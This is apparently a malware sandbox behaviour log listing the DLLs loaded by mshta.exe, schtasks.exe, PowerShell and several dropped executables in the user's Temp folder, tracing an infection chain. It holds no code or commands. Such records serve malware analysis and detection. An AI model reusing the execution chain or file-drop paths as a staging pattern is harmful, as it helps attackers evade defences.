Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: dataexchange.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: d3d11.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: dcomp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: twinapi.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: d2d1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: mshtml.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: msiso.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: srpapi.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: msimtf.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: dxgi.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: resourcepolicyclient.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: jscript9.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: dataexchange.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: d3d11.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: dcomp.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: twinapi.appcore.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: d2d1.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	Section loaded: mstask.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	Section loaded: dui70.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	Section loaded: duser.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	Section loaded: chartv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	Section loaded: atlthunk.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	Section loaded: winsta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	Section loaded: windows.fileexplorer.common.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	Section loaded: explorerframe.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\10102370101\SvhQA35.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\10102370101\SvhQA35.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\10102370101\SvhQA35.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\10102370101\SvhQA35.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\10102370101\SvhQA35.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\10102370101\SvhQA35.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\10102370101\SvhQA35.exe	Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\10102370101\SvhQA35.exe	Section loaded: windows.fileexplorer.common.dll
Source: C:\Users\user\AppData\Local\Temp\10102370101\SvhQA35.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\10102370101\SvhQA35.exe	Section loaded: ntshrui.dll
Source: C:\Users\user\AppData\Local\Temp\10102370101\SvhQA35.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\10102370101\SvhQA35.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\10102370101\SvhQA35.exe	Section loaded: cscapi.dll
Source: C:\Users\user\AppData\Local\Temp\10102370101\SvhQA35.exe	Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\10102370101\SvhQA35.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\10102370101\SvhQA35.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\onefile_7896_133856820214566652\chromium.exe	Section loaded: python312.dll
Source: C:\Users\user\AppData\Local\Temp\onefile_7896_133856820214566652\chromium.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\onefile_7896_133856820214566652\chromium.exe	Section loaded: vcruntime140.dll
Source: C:\Users\user\AppData\Local\Temp\onefile_7896_133856820214566652\chromium.exe	Section loaded: iphlpapi.dll
